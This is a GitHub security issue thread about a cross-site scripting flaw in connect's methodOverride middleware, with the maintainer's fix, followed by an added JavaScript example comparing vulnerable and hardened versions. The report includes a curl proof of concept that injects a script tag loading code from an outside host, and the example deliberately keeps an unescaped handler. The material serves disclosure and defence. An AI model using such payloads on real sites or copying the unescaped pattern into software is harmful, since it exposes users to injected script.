Security Issue - Cross-Site Scripting with connect.methodOverride() #831

Closed
m13 opened this Issue Jun 27, 2013 · 1 comment


m13 commented Jun 27, 2013

This middleware overwrites req.method with the req.body['_method'] value. When you don't catch the error, it responds with a default error message: "Cannot [METHOD] [URL]" (

res.end('Cannot ' + req.method + ' ' + utils.escape(req.originalUrl));
). Because this is not sufficiently sanitized, you can force a Cross-Site Scripting in the response:

~ curl "localhost:3000" -d "_method=<script src=http://martes13.net/a.js></script>"
Cannot <SCRIPT SRC=HTTP://MARTES13.NET/A.JS></SCRIPT> /

This is very dangerous because in a server like ExpressJS it won't be handled with an app.all('/*', ...), so all servers using this middleware are vulnerable.

To fix this hole, I don't know if it is better to fix proto.js#L155 or the middleware.

Member

tj commented Jun 27, 2013

I patched with an escape for now, but I'll whitelist the methods as well. It's not a huge vulnerability since you can't easily pass around a POST, but it doesn't hurt to escape. Thanks for the report.

@tj tj closed this Jun 27, 2013
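The two mitigations discussed in this thread (escaping the method name the fallback handler echoes, and whitelisting which methods `_method` may select), shown side by side with the unchecked shape m13 reported. This is an added example, not connect's own middleware or proto.js code; it runs offline against constructed request objects, the `escapeHtml` helper stands in for connect's `utils.escape`, the method whitelist is an assumed choice, and the payload URL is a placeholder rather than the one in the report.

```javascript
// Added example (not connect's code): methodOverride with and without a
// method whitelist, and a 404 fallback with and without escaping req.method.
// No connect/express dependency; req/res are plain constructed objects.

// Assumed whitelist of methods a client may select via _method.
const ALLOWED_METHODS = new Set(['GET', 'HEAD', 'POST', 'PUT', 'PATCH', 'DELETE', 'OPTIONS']);

// Minimal HTML escaping for text placed in an HTML response body
// (assumed helper standing in for connect's utils.escape).
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Unchecked shape, as in the report: whatever the client sends in _method
// becomes req.method, uppercased and otherwise untouched.
function methodOverrideUnchecked(req) {
  if (req.body && typeof req.body._method === 'string') {
    req.originalMethod = req.method;
    req.method = req.body._method.toUpperCase();
  }
  return req;
}

// Whitelisted shape: only a known method name may replace req.method;
// anything else is ignored and the original method is kept.
function methodOverrideWhitelisted(req, allowed = ALLOWED_METHODS) {
  if (req.body && typeof req.body._method === 'string') {
    const candidate = req.body._method.toUpperCase();
    if (allowed.has(candidate)) {
      req.originalMethod = req.method;
      req.method = candidate;
    }
  }
  return req;
}

// Fallback used when no route matched. The unsafe version only escapes the
// URL and echoes req.method raw (the bug reported); the safe one escapes both.
function notFoundUnsafe(req) {
  return { status: 404, body: 'Cannot ' + req.method + ' ' + escapeHtml(req.originalUrl) };
}
function notFoundSafe(req) {
  return { status: 404, body: 'Cannot ' + escapeHtml(req.method) + ' ' + escapeHtml(req.originalUrl) };
}

// Constructed request mimicking the curl in the report (sample input, not a capture).
function makeRequest(methodValue) {
  return { method: 'POST', originalUrl: '/', body: { _method: methodValue } };
}

// Placeholder payload; the host is an assumption, not the reporter's.
const PAYLOAD = '<script src=http://example.invalid/a.js></script>';

// Unchecked override + unsafe fallback: the script tag is reflected (uppercased).
function demoUnchecked() {
  return notFoundUnsafe(methodOverrideUnchecked(makeRequest(PAYLOAD))).body;
}

// Whitelisted override + safe fallback: method stays POST, body is inert text.
function demoHardened() {
  const req = methodOverrideWhitelisted(makeRequest(PAYLOAD));
  return { method: req.method, body: notFoundSafe(req).body };
}

// Escaping alone still lets an arbitrary string become req.method; it just
// cannot break out of the HTML. Shown to make clear why both fixes matter.
function demoEscapeOnly() {
  return notFoundSafe(methodOverrideUnchecked(makeRequest(PAYLOAD))).body;
}

// A legitimate override (form posting _method=delete) still works.
function demoLegit() {
  return methodOverrideWhitelisted(makeRequest('delete')).method;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demoUnchecked());
  console.log(demoHardened());
  console.log(demoEscapeOnly());
  console.log(demoLegit());
}
```

Whitelisting is the fix that actually matters for routing: without it a request with a fabricated verb still reaches every later middleware with `req.method` set to attacker-controlled text, and escaping only keeps that text from being interpreted as HTML where it happens to be echoed.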

@hacksparrow hacksparrow referenced this issue in expressjs/expressjs.com Nov 3, 2014

Closed

List security issues #221
